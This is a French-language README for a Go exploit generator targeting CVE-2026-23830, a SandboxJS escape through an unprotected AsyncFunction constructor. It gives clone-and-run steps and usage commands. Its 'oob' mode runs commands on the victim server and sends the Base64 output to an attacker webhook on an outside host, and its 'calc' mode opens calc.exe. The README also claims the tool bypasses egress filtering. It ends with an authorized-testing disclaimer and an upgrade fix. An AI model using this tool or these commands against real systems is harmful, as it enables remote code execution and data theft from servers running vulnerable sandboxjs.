
Génère et fournit des charges utiles d'exploitation pour CVE-2026-23830, une évasion de SandboxJS, avec des modes pour l'exfiltration OOB aveugle et un PoC local de type calc. Prend en charge les écouteurs HTTP/HTTPS et produit des charges utiles JavaScript minifiées.
SandBreak est un générateur d'exploit robuste basé sur Go, conçu pour exploiter la vulnérabilité d'évasion SandboxJS (CVE-2026-23830).
Cet outil exploite le constructeur AsyncFunction non protégé dans les anciennes versions de sandboxjs, permettant aux attaquants de s'échapper de l'environnement sandbox V8 et d'exécuter du code arbitraire sur le système hôte. Il prend en charge plusieurs modes de payload, notamment l'exfiltration aveugle hors bande (OOB), la défiguration et l'exécution de code à distance basée sur les erreurs.
oob : Exfiltration de données hors bande (HTTP/HTTPS) pour les scénarios aveugles.calc : Ouvre calc.exe (PoC classique).Clonez le dépôt et exécutez :
git clone https://github.com/Galaxy-sc/CVE-2026-23830-SandBreak.git
cd CVE-2026-23830-SandBreak
go run CVE-2026-23830.go
go run CVE-2026-23830.go -mode [MODE] -cmd [COMMAND] [OPTIONS]
Utilisez ce mode lorsque vous n'avez aucun retour visuel. Il exécute la commande et envoie le résultat encodé en Base64 à votre écouteur (par exemple, webhook.site).
go run CVE-2026-23830.go -mode oob -cmd "whoami" -url "https://webhook.site/YOUR-UUID"
Contourne avec succès les crashs de filtrage egress de base en gérant les erreurs réseau.
Ouvre une calculatrice sur le serveur Windows.
go run CVE-2026-23830.go -mode calc
L'attaquant reçoit les données utilisateur du serveur via Webhook malgré l'absence de sortie visuelle sur le site.
Cet outil est créé uniquement à des fins éducatives et pour des tests d'intrusion autorisés.
Mettez à niveau sandboxjs vers la dernière version où le constructeur AsyncFunction est correctement sandboxé.
npm update sandboxjs
Auteur : Meysam Bal-afkan
Licence : MIT